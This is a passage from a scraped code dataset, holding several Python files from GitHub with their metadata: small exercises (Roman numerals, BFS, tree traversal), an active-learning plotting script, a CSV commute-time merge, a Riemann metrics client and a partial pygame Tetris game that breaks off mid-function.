transformation should produce [-1, 5, 0, -3, 4].\n\"\"\"\nimport random\nLIST_SIZE = 5\n\n\ndef list_generator(list_dimension):\n my_list = []\n for i in range(list_dimension):\n my_list.append(random.randint(-9, 9))\n return my_list\n\n\ndef list_converter(some_list):\n for i in range(len(some_list)):\n some_list[i] = -some_list[i]\n return some_list\n\n\nif __name__ == '__main__':\n def_list = list_generator(LIST_SIZE)\n print('For the random list:', def_list)\n print('Our transformation looks like this:', list_converter(def_list))\n\n","repo_name":"litvinovserge/WebAcademy","sub_path":"HomeWork_06/Task_03.py","file_name":"Task_03.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30858682651","text":"\r\nfrom AL_wlib import *\r\nimport pandas as pd\r\nimport numpy as np\r\nplt_show = False\r\n\r\ndef setup(s=1.0, nrows=1, ncols=1):\r\n import matplotlib\r\n matplotlib.rcParams.update({'figure.dpi': 1080})\r\n matplotlib.rcParams.update({'font.size': 15})\r\n\r\n matplotlib.rcParams.update({'legend.fontsize': 13})\r\n import __main__ as pc\r\n pc.default_figsize=(20, 10)\r\n pc.default_figsize = (pc.default_figsize[0]*s, pc.default_figsize[1]*s)\r\n import matplotlib.pyplot as plt\r\n plt.close()\r\n return plt.subplots(nrows, ncols, figsize=pc.default_figsize)\r\nclass PlotStyles:\r\n def __init__(self):\r\n self.markers = []\r\n self.markers += ['.']\r\n self.markers += ['1', '2', '3', '4', '+', 'x']\r\n self.markers += [4, 5, 6, 7, 8, 9, 10, 11]\r\n self.linestyles = [\r\n (0, (1, 1)),\r\n (0, (5, 10)),\r\n (0, (5, 5)),\r\n (0, (5, 1)),\r\n (0, (3, 10, 1, 10)),\r\n (0, (3, 5, 1, 5)),\r\n (0, (3, 1, 1, 1)),\r\n (0, (3, 5, 1, 5, 1, 5)),\r\n (0, (3, 10, 1, 10, 1, 10)),\r\n (0, (3, 1, 1, 1, 1, 1))\r\n ]\r\n self.colors = ['tab:blue', 'tab:orange', 'tab:green', 'tab:red', 'tab:purple', 'tab:brown', 'tab:pink', 'tab:gray', 'tab:olive', 'tab:cyan', 'black'] # matplotlib's tab palette has no 'tab:black'\r\n self.reset()\r\n def reset(self):\r\n self.c_colors = 0\r\n self.c_markers = 0\r\n self.c_linestyles = 0\r\n def set_color_counter(self, c):\r\n self.c_colors = c\r\n def set_marker_counter(self, c):\r\n self.c_markers = c\r\n def set_linestyle_counter(self, c):\r\n self.c_linestyles = c\r\n def getNextStyle(self):\r\n retval = {}\r\n retval['color'] = self.colors[self.c_colors % len(self.colors)]\r\n retval['marker'] = self.markers[self.c_markers % len(self.markers)]\r\n retval['linestyle'] = self.linestyles[self.c_linestyles % len(self.linestyles)]\r\n self.c_colors += 1\r\n self.c_markers += 1\r\n self.c_linestyles += 1\r\n return retval\r\n\r\n\r\nfrom warnings import filterwarnings\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\nphy_data = pd.read_pickle(\"./phy_2go.pkl\")\r\nclasses = np.load(\"./phy_2go_class.npy\")\r\n\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(phy_data['Body'], classes,test_size =0.1, random_state=0)\r\n\r\nX_train=X_train.to_numpy()\r\nX_test=X_test.to_numpy()\r\n\r\n\r\nquery_size=25\r\ninitdata=10\r\n\r\n\r\nselection=np.random.choice(X_train.shape[0], initdata, replace=False)\r\n\r\n\r\n\r\n\r\n\r\n\r\nconfiguration5=config(query_size, OneVsRestClassifier_Ada, qbc, TfidfVectorizer,401, [], [5,(1,1)] )\r\nmodel5=ALmodel(configuration5,X_train,y_train,X_test,y_test,selection)\r\n\r\nmodel5.run()\r\nprint(\"Hey\")\r\n\r\nconfiguration=config(query_size, OneVsRestClassifier_Ada, infodensity, TfidfVectorizer,401, [], 
[5,(1,1)])\r\nmodel=ALmodel(configuration,X_train,y_train,X_test,y_test,selection)\r\n\r\nmodel.run()\r\n\r\n\r\nconfiguration_r=config(query_size, OneVsRestClassifier_Ada, RandomSelection, TfidfVectorizer,401, [], [5,(1,1)] )\r\nmodel_r=ALmodel(configuration_r,X_train,y_train,X_test,y_test,selection)\r\n\r\nmodel_r.run()\r\n\r\nconfiguration2=config(query_size, OneVsRestClassifier_Ada,MarginSelection, TfidfVectorizer,401, [], [5,(1,1)] )\r\nmodel2=ALmodel(configuration2,X_train,y_train,X_test,y_test,selection)\r\n\r\nmodel2.run()\r\n\r\n#configuration3=config(query_size, RandomForest, graph, TfidfVectorizer,50, [], [5,(1,1)] )\r\n#model3=ALmodel(configuration3,X_train,y_train,X_test,y_test,selection)\r\n\r\n#model3.run()\r\nprint(\"Hey\")\r\n\r\n\r\n#configuration4=config(query_size, RandomForest, quire, TfidfVectorizer,50, [], [5,(1,1)] )\r\n#model4=ALmodel(configuration4,X_train,y_train,X_test,y_test,selection)\r\n#model4.run()\r\n\r\nps = PlotStyles()\r\nvectorizer=tfidfvec(max_features=5000,min_df=5,ngram_range=(1, 1))\r\nvectorizer.fit(X_train)\r\nX_full_Vect = vectorizer.transform(X_train)\r\nfrom sklearn.multiclass import OneVsRestClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier as randoforest\r\nfrom sklearn.ensemble import AdaBoostClassifier as adaboost\r\nfrom sklearn.svm import LinearSVC\r\nmodel_full=OneVsRestClassifier(adaboost())\r\nmodel_full.fit(X_full_Vect, y_train)\r\nprediction = model_full.predict(vectorizer.transform(X_test))\r\naccuracy_whole=accuracy_score(y_test, prediction)\r\n\r\n\r\nfig, ax = setup()\r\n\r\n\r\ntraining_size=[m*query_size for m in range (len(model.accuracy_test))]\r\naccuracy_whole = [accuracy_whole for m in range (len(model.accuracy_test))]\r\n\r\nprint( model.accuracy_test)\r\nprint( model_r.accuracy_test)\r\nprint( model2.accuracy_test)\r\nprint( model5.accuracy_test)\r\nprint (accuracy_whole)\r\nax.plot(training_size, model_r.accuracy_test,**ps.getNextStyle(), label='random selection batch=25')\r\nax.plot(training_size, model.accuracy_test,**ps.getNextStyle(), label='infodensity selection batch=25')\r\nax.plot(training_size, model2.accuracy_test,**ps.getNextStyle(), label='margin selection batch=25')\r\nax.plot(training_size, model5.accuracy_test,**ps.getNextStyle(), label='qbc selection batch=25')\r\nax.plot(training_size, accuracy_whole,**ps.getNextStyle(), label='training with whole data')\r\n\r\n\r\n\r\n\r\nprint(\" (((0) \")\r\n\r\n\r\ntit='OneVsRestClassifier_Ada, 25 class physics data, batch size=10, queried limit =400'\r\nax.set(xlabel='labeled data size', ylabel='accuracy with test data',title=tit)\r\nax.grid(which='minor', alpha=0.2)\r\nax.grid(which='major', alpha=0.5)\r\nax.legend()\r\nfig.savefig('OneVsRestClassifier_Ada _batch25_lim400.svg', format='svg', dpi=1080)\r\n","repo_name":"yusaemek/NLP-with-Active-Learning","sub_path":"active_NLP/phys_exchange/act_learn_wplot.py","file_name":"act_learn_wplot.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35444842061","text":"\"\"\"Roman numerals are represented by seven different symbols: I, V, X, L, C, D\nand M.\n\nSymbol Value\nI 1\nV 5\nX 10\nL 50\nC 100\nD 500\nM 1000\n\nGiven a roman numeral, convert it to an integer.\nInput: s = \"III\"\nOutput: 3\nExplanation: III = 3.\n\nInput: s = \"LVIII\"\nOutput: 58\nExplanation: L = 50, V= 5, III = 3.\n\nInput: s = \"MCMXCIV\"\nOutput: 1994\nExplanation: M = 1000, CM = 900, XC = 90 and IV = 4.\n\n1 <= s.length <= 
15\ns contains only the characters ('I', 'V', 'X', 'L', 'C', 'D', 'M').\nIt is guaranteed that s is a valid roman numeral in the range [1, 3999].\"\"\"\n\n\nIV = 4\nIX = 9\nXL = 40\nXC = 90\nCD = 400\nCM = 900\n\n\nclass ArabianRomanConvertor:\n __roman_arabian = {\n 'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000,\n 'IV': 4, 'IX': 9, 'XL': 40, 'XC': 90, 'CD': 400, 'CM': 900\n }\n\n @staticmethod\n def roman_to_arabian(x):\n value = 0\n i = 0\n while i < len(x):\n if i < len(x) - 1:\n try:\n value_complex_key = (\n ArabianRomanConvertor.__get_arabian_by_char(\n x[i] + x[i + 1])\n )\n value += value_complex_key\n i += 2\n except ValueError:\n value += ArabianRomanConvertor.__get_arabian_by_char(x[i])\n i += 1\n else:\n value += ArabianRomanConvertor.__get_arabian_by_char(x[i])\n i += 1\n return value\n\n @staticmethod\n def __get_arabian_by_char(char):\n if ArabianRomanConvertor.__roman_arabian.get(char) is None:\n raise ValueError(\"x is not Roman\")\n else:\n return ArabianRomanConvertor.__roman_arabian.get(char)\n\n\nassert ArabianRomanConvertor.roman_to_arabian(\"III\") == 3\nassert ArabianRomanConvertor.roman_to_arabian(\"LVIII\") == 58\nassert ArabianRomanConvertor.roman_to_arabian(\"MCMXCIV\") == 1994\n","repo_name":"konmin123/Leetcode_","sub_path":"13. Roman to Integer.py","file_name":"13. Roman to Integer.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"4343422595","text":"import sys\r\nfrom collections import deque\r\n\r\nn, m = map(int, sys.stdin.readline().split())\r\narray = list()\r\n\r\nfor _ in range(m):\r\n array.append(list(map(int, sys.stdin.readline().split())))\r\n\r\ndirec = [[-1]*n for _ in range(m)]\r\n\r\nstora = deque()\r\n\r\nfor i in range(m):\r\n for j in range(n):\r\n if array[i][j] == 1:\r\n direc[i][j] = 0\r\n stora.append((i,j))\r\n\r\nwhile stora:\r\n y, x = stora.popleft()\r\n\r\n for y1, x1 in ([y-1, x], [y+1, x], [y, x+1], [y, x-1]):\r\n if 0 <= y1 < m and 0 <= x1 < n:\r\n if array[y1][x1] == 0 and direc[y1][x1] == -1:\r\n stora.append((y1,x1))\r\n direc[y1][x1] = direc[y][x] + 1\r\n\r\n\r\nans = max([max(row) for row in direc])\r\nfor i in range(m):\r\n for j in range(n):\r\n if array[i][j] == 0 and direc[i][j] == -1:\r\n ans = -1\r\n\r\nprint(ans)","repo_name":"kalelpark/Baekjoon-Programmers","sub_path":"DFS&BFS/BOJ2667.py","file_name":"BOJ2667.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39639767943","text":"import pygame as pg\n\n\ndef t1():\n pg.init()\n\n screen = pg.display.set_mode((640, 480))\n clock = pg.time.Clock()\n BG_COLOR = pg.Color('gray12')\n SIENNA = pg.Color('sienna1')\n radius = 20\n # This rect serves as the position of the circle and\n # can be used for collision detection.\n rect = pg.Rect(50, 200, radius, radius)\n\n done = False\n while not done:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n done = True\n\n rect.x += 1 # Update the position of the rect.\n\n screen.fill(BG_COLOR)\n # Now draw the circle at the center of the rect.\n pg.draw.circle(screen, SIENNA, rect.center, radius)\n pg.display.flip()\n clock.tick(30)\n\n pg.quit()\n\n\nif __name__ == '__main__':\n t1()\n","repo_name":"lukwil/Mobile-Robots","sub_path":"t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 
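The t1.py record above tracks a moving circle with a pygame.Rect so that a single object drives both drawing and collision detection. A minimal sketch of where that pattern pays off, with a second, hypothetical target circle added (the names and colors here are illustrative assumptions, not from the record):

```python
import pygame as pg

pg.init()
screen = pg.display.set_mode((640, 480))
clock = pg.time.Clock()

radius = 20
# Each circle's position and hitbox live in one Rect (sized to the diameter).
player = pg.Rect(50, 200, radius * 2, radius * 2)
target = pg.Rect(300, 200, radius * 2, radius * 2)

done = False
while not done:
    for event in pg.event.get():
        if event.type == pg.QUIT:
            done = True

    player.x += 1  # move by updating the Rect, exactly as in the record

    # The same Rect doubles as the collision volume.
    hit = player.colliderect(target)

    screen.fill(pg.Color('gray12'))
    pg.draw.circle(screen, pg.Color('red' if hit else 'sienna1'), player.center, radius)
    pg.draw.circle(screen, pg.Color('aquamarine'), target.center, radius)
    pg.display.flip()
    clock.tick(30)

pg.quit()
```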
+{"seq_id":"29940365164","text":"# -*- coding: utf-8 -*-\n\"\"\"\nImports data from a CSV into a pandas dataframe\n@author: Marvin\n\"\"\"\nimport pandas as pd\n#Actually imports the data from a CSV while specifying the header names, \n#the separator, how many rows to skip, and the NA values.\n#skiprows skips the header row\n\ncity_file = 'D:\\\\Users\\\\Marvin\\\\Google Drive\\\\CSC\\\\CSC495\\\\Amazon Problem\\\\city_list.csv'\ncity_list = pd.read_csv(city_file, names=['state', 'city', 'MSA', 'is_top_twenty'],\n sep='|', skiprows=1, na_values=[0])\n\ncommute_times_df = city_list\ncommute_times_df['Average Commute Time'] = 0\n\ncity_commute_file = 'D:\\\\Users\\\\Marvin\\\\Google Drive\\\\CSC\\\\CSC495\\\\Amazon Problem\\\\commute_times_city.csv'\ncity_commute_df = pd.read_csv(city_commute_file, names=['index','City','Avg Commute Time'], \n sep='|', skiprows=1, na_values=['?'], encoding='latin-1')\n#city_commute_df = city_commute_df.drop(['index'], axis=1)\n\ncity = []\nstate = []\n\nus_state_abbrev = {\n 'Alabama': 'AL',\n 'Alaska': 'AK',\n 'Arizona': 'AZ',\n 'Arkansas': 'AR',\n 'California': 'CA',\n 'Colorado': 'CO',\n 'Connecticut': 'CT',\n 'Delaware': 'DE',\n 'Florida': 'FL',\n 'Georgia': 'GA',\n 'Hawaii': 'HI',\n 'Idaho': 'ID',\n 'Illinois': 'IL',\n 'Indiana': 'IN',\n 'Iowa': 'IA',\n 'Kansas': 'KS',\n 'Kentucky': 'KY',\n 'Louisiana': 'LA',\n 'Maine': 'ME',\n 'Maryland': 'MD',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'Minnesota': 'MN',\n 'Mississippi': 'MS',\n 'Missouri': 'MO',\n 'Montana': 'MT',\n 'Nebraska': 'NE',\n 'Nevada': 'NV',\n 'New Hampshire': 'NH',\n 'New Jersey': 'NJ',\n 'New Mexico': 'NM',\n 'New York': 'NY',\n 'North Carolina': 'NC',\n 'North Dakota': 'ND',\n 'Ohio': 'OH',\n 'Oklahoma': 'OK',\n 'Oregon': 'OR',\n 'Pennsylvania': 'PA',\n 'Rhode Island': 'RI',\n 'South Carolina': 'SC',\n 'South Dakota': 'SD',\n 'Tennessee': 'TN',\n 'Texas': 'TX',\n 'Utah': 'UT',\n 'Vermont': 'VT',\n 'Virginia': 'VA',\n 'Washington': 'WA',\n 'Washington DC': 'DC',\n 'West Virginia': 'WV',\n 'Wisconsin': 'WI',\n 'Wyoming': 'WY',\n 'Puerto Rico': 'PR',\n}\n\nabbrev_to_state = {v: k for k, v in us_state_abbrev.items()}\n\n\nstate = []\ncity = []\n\nfor index, row in city_commute_df.iterrows():\n temp1 = row['City']\n temp = temp1.split(', ')\n city.append(temp[0])\n state.append(abbrev_to_state[temp[len(temp) - 1]])\n\ncity_commute_df['City'] = city\ncity_commute_df['state'] = state\nfinal_data_frame = pd.DataFrame()\nfinal_data_frame['City'] = city_commute_df['City']\nfinal_data_frame['State'] = city_commute_df['state']\nfinal_data_frame['Avg Commute Time (minutes)'] = city_commute_df['Avg Commute Time']\ncommute_list = []\nflag = 0\nfor row in commute_times_df.itertuples():\n for row2 in final_data_frame.itertuples():\n temp_city = row2[1]\n temp_state = row2[2]\n temp_amazon_city = str(row[2])\n if ((temp_state == row[1]) and ((temp_city == temp_amazon_city) or (temp_city in temp_amazon_city))):\n commute_list.append(row2[3])\n flag = 1\n break\n if (flag != 1):\n commute_list.append(0)\n flag = 0\n \n\ncommute_times_df['Average Commute Time'] = commute_list \n\ncsv_out = 'D:\\\\Users\\\\Marvin\\\\Google Drive\\\\CSC\\\\CSC495\\\\Amazon Problem\\\\commute_times_amazon_cities.csv'\ncommute_times_df.to_csv(csv_out, sep='|', na_rep='?', \n columns=['state', 'city', 'MSA', 'is_top_twenty', 'Average Commute 
Time'])\n","repo_name":"ejgillia/csc495_amazon","sub_path":"scripts/pandasFromCSV_commute_times_amazon_cities.py","file_name":"pandasFromCSV_commute_times_amazon_cities.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25145550452","text":"from riemann_client.transport import TCPTransport\nfrom riemann_client.client import QueuedClient\n\nfrom ..rabbitmq.message import Message\nfrom ..consumer.consumer import ConsumerClient\n\n\nclass RiemannClient(ConsumerClient):\n def __init__(self, config):\n self.client = QueuedClient(TCPTransport(config.riemann_host, config.riemann_port))\n self.client.transport.connect()\n\n def recieve_message(self, message):\n for hostname, metrics in message.items():\n for metric in metrics:\n message = Message(**metric)\n self.client.event(service=message.service, metric_f=message.metric, host=hostname)\n\n self.client.flush()\n","repo_name":"chestm007/Chestymetrics","sub_path":"chestymetrics/lib/riemann/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18847647042","text":"#590. N-ary Tree Postorder Traversal\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def postorder(self, root: 'Node') -> List[int]:\n if not root:\n return []\n stack = []\n res =[]\n stack.append(root) \n while stack:\n node = stack.pop() #node = [5]\n res.append(node.val) #res = [1,3,5]\n stack.extend(node.children) #stack = [4,2,6]\n return res[::-1]\n\n #regit cursive way\n # \"\"\"\n # # Definition for a Node.\n # class Node:\n # def __init__(self, val=None, children=None):\n # self.val = val\n # self.children = children\n # \"\"\"\n\n # class Solution:\n # def postorder(self, root: 'Node') -> List[int]:\n\n # res =[]\n # if not root:\n # return res\n # for child in root.children:\n # res.extend(self.postorder(child))\n # res.append(root.val)\n # return res","repo_name":"sebaschen/leetcode","sub_path":"590_N-ary_Tree_Postorder_Traversal.py","file_name":"590_N-ary_Tree_Postorder_Traversal.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"765886614","text":"import pygame\nimport copy\nfrom pygame.locals import *\nfrom sys import exit\nimport random\nfrom threading import Thread\n\npygame.init()\nbackground = './background.jpg'\nrecord_file_path = './record.txt'\nbox = './box.png'\nmusic = './BGM.mp3'\n# 打开文件\nrecord_file = open(record_file_path, 'r')\nrecord_list = eval(record_file.read())\nrecord_file.close()\nok_bg = 0\n\n\nclass Russia(object):\n # 初始化背景\n def init_screen(self):\n self.screen = pygame.display.set_mode([1920, 1080], pygame.FULLSCREEN, 32)\n global ok_bg\n ok_bg = 1\n\n def __init__(self, color=0):\n self.de_color = color\n # 初始化屏幕\n if ok_bg == 0:\n self.init_screen()\n self.bg_picture = pygame.image.load(background).convert()\n self.box_picture = pygame.image.load(box).convert_alpha()\n pygame.mixer_music.load(music)\n pygame.mixer_music.play(loops=100)\n pygame.mixer_music.set_volume(0.3)\n # 初始化字体\n self.my_font = pygame.font.SysFont('kaiti', 30, True, True)\n # 初始化得分\n self.my_count = 0\n # 初始化边界矩形列表\n self.border_fixed_rec = []\n # 初始化第一个块\n self.next_box = self.choice(random.randint(1, 7))\n # 初始化颜色\n if 
color == 0:\n c = [random.randint(10, 245), random.randint(10, 245), random.randint(10, 245)]\n else:\n c = color\n self.rec_1_next = c\n self.rec_2_next = c\n self.rec_3_next = c\n self.rec_4_next = c\n # 下边界\n for x in range(15):\n self.border_fixed_rec.append([682+x*30, 938, 30, 30])\n # 左右边界\n for y in range(33):\n self.border_fixed_rec.append([651, 9+y*30, 30, 30])\n self.border_fixed_rec.append([1132, 9+y*30, 30, 30])\n # 累积块\n self.accumulate_list = []\n # 暂停键\n self.pause = 0\n # 创建矩形\n self.create_new()\n # 时间标志\n self.time_record = 0\n # 变形次数标志\n self.change_record = 0\n # 游戏结束标志\n self.end = 0\n # 暂停标志\n self.pause = 0\n # 等级\n self.level = 1\n # 重新开始方框和显示格子方框和暂停和打开背景音乐\n self.restart_box = pygame.rect.Rect(1540, 450, 130, 50)\n self.show_lines_box = pygame.rect.Rect(200, 350, 100, 30)\n self.pause_box = pygame.rect.Rect(200, 400, 100, 30)\n self.music_box = pygame.rect.Rect(1550, 600, 100, 30)\n # 显示格子\n self.show_lines = 1\n # RGB颜色\n self.lines_color1 = 255\n self.lines_color2 = 0\n self.lines_color3 = 0\n # 暂停标志\n self.pause = -1\n # 快速下落标志\n self.down_fast = 0\n # 播放音乐标志\n self.stop_music = 0\n self.mix_color = 1\n\n # 变形\n def change(self):\n # 三叉\n if isinstance(self.now_box, Trig):\n # 判断是否能变形\n if self.change_record == 0:\n for rect in self.border_fixed_rec:\n next_x = [self.rec_3[0] + 30, self.rec_3[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rect):\n return\n self.rec_3[0] += 30\n self.rec_3[1] += 30\n self.change_record = 1\n elif self.change_record == 1:\n for rect in self.border_fixed_rec:\n next_x = [self.rec_1[0] - 30, self.rec_1[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rect):\n return\n self.rec_1[0] -= 30\n self.rec_1[1] += 30\n self.change_record = 2\n elif self.change_record == 2:\n for rect in self.border_fixed_rec:\n next_x = [self.rec_4[0] - 30, self.rec_4[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rect):\n return\n self.rec_4[0] -= 30\n self.rec_4[1] -= 30\n self.change_record = 3\n else:\n for rect in self.border_fixed_rec:\n next_x = [self.rec_3[0] + 30, self.rec_3[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rect):\n return\n self.rec_1[0] += 30\n self.rec_1[1] -= 30\n self.rec_3[0] -= 30\n self.rec_3[1] -= 30\n self.rec_4[0] += 30\n self.rec_4[1] += 30\n self.change_record = 0\n # 直线\n if isinstance(self.now_box, Beeline):\n # 判断是否能变形\n if self.change_record == 0:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] - 30, self.rec_1[1] + 30, 30, 30]\n next_x2 = [self.rec_3[0] + 30, self.rec_3[1] - 30, 30, 30]\n next_x3 = [self.rec_4[0] + 60, self.rec_4[1] - 60, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(rect) or \\\n pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] -= 30\n self.rec_1[1] += 30\n self.rec_3[0] += 30\n self.rec_3[1] -= 30\n self.rec_4[0] += 60\n self.rec_4[1] -= 60\n self.change_record = 1\n else:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] + 30, self.rec_1[1] - 30, 30, 30]\n next_x2 = [self.rec_3[0] - 30, self.rec_3[1] + 30, 30, 30]\n next_x3 = [self.rec_4[0] - 60, self.rec_4[1] + 60, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(rect) or \\\n pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] += 30\n self.rec_1[1] -= 30\n self.rec_3[0] -= 30\n self.rec_3[1] += 30\n self.rec_4[0] -= 60\n self.rec_4[1] += 60\n self.change_record = 0\n # 左直\n if isinstance(self.now_box, LBeeline):\n # 判断是否能变形\n if 
self.change_record == 0:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] + 60, self.rec_1[1], 30, 30]\n next_x2 = [self.rec_3[0] + 30, self.rec_3[1] - 30, 30, 30]\n next_x3 = [self.rec_4[0] - 30, self.rec_4[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(rect) or \\\n pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] += 60\n self.rec_3[0] += 30\n self.rec_3[1] -= 30\n self.rec_4[0] -= 30\n self.rec_4[1] += 30\n self.change_record = 1\n elif self.change_record == 1:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0], self.rec_1[1] + 60, 30, 30]\n next_x2 = [self.rec_3[0] + 30, self.rec_3[1] + 30, 30, 30]\n next_x3 = [self.rec_4[0] - 30, self.rec_4[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(rect) or \\\n pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[1] += 60\n self.rec_3[0] += 30\n self.rec_3[1] += 30\n self.rec_4[0] -= 30\n self.rec_4[1] -= 30\n self.change_record = 2\n elif self.change_record == 2:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] - 60, self.rec_1[1], 30, 30]\n next_x2 = [self.rec_3[0] - 30, self.rec_3[1] + 30, 30, 30]\n next_x3 = [self.rec_4[0] + 30, self.rec_4[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(rect) or \\\n pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] -= 60\n self.rec_3[0] -= 30\n self.rec_3[1] += 30\n self.rec_4[0] += 30\n self.rec_4[1] -= 30\n self.change_record = 3\n else:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0], self.rec_1[1] - 60, 30, 30]\n next_x2 = [self.rec_3[0] - 30, self.rec_3[1] - 30, 30, 30]\n next_x3 = [self.rec_4[0] + 30, self.rec_4[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(rect) or \\\n pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[1] -= 60\n self.rec_3[0] -= 30\n self.rec_3[1] -= 30\n self.rec_4[0] += 30\n self.rec_4[1] += 30\n self.change_record = 0\n # 右直\n if isinstance(self.now_box, RBeeline):\n # 判断是否能变形\n if self.change_record == 0:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0], self.rec_1[1] + 60, 30, 30]\n next_x2 = [self.rec_3[0] + 30, self.rec_3[1] - 30, 30, 30]\n next_x3 = [self.rec_4[0] - 30, self.rec_4[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[1] += 60\n self.rec_3[0] += 30\n self.rec_3[1] -= 30\n self.rec_4[0] -= 30\n self.rec_4[1] += 30\n self.change_record = 1\n elif self.change_record == 1:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] - 60, self.rec_1[1], 30, 30]\n next_x2 = [self.rec_3[0] + 30, self.rec_3[1] + 30, 30, 30]\n next_x3 = [self.rec_4[0] - 30, self.rec_4[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] -= 60\n self.rec_3[0] += 30\n self.rec_3[1] += 30\n self.rec_4[0] -= 30\n self.rec_4[1] -= 30\n self.change_record = 2\n elif self.change_record == 2:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0], self.rec_1[1] - 60, 30, 30]\n next_x2 = [self.rec_3[0] - 30, self.rec_3[1] + 30, 30, 30]\n next_x3 = [self.rec_4[0] + 30, self.rec_4[1] - 30, 30, 30]\n if 
pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[1] -= 60\n self.rec_3[0] -= 30\n self.rec_3[1] += 30\n self.rec_4[0] += 30\n self.rec_4[1] -= 30\n self.change_record = 3\n else:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] + 60, self.rec_1[1], 30, 30]\n next_x2 = [self.rec_3[0] - 30, self.rec_3[1] - 30, 30, 30]\n next_x3 = [self.rec_4[0] + 30, self.rec_4[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] += 60\n self.rec_3[0] -= 30\n self.rec_3[1] -= 30\n self.rec_4[0] += 30\n self.rec_4[1] += 30\n self.change_record = 0\n # 左梯\n if isinstance(self.now_box, LLadder):\n # 判断是否能变形\n if self.change_record == 0:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] + 30, self.rec_1[1] + 30, 30, 30]\n next_x2 = [self.rec_3[0] + 60, self.rec_3[1], 30, 30]\n next_x3 = [self.rec_4[0] - 30, self.rec_4[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] += 30\n self.rec_1[1] += 30\n self.rec_3[0] += 60\n self.rec_4[0] -= 30\n self.rec_4[1] += 30\n self.change_record = 1\n else:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] - 30, self.rec_1[1] - 30, 30, 30]\n next_x2 = [self.rec_3[0] - 60, self.rec_3[1], 30, 30]\n next_x3 = [self.rec_4[0] + 30, self.rec_4[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] -= 30\n self.rec_1[1] -= 30\n self.rec_3[0] -= 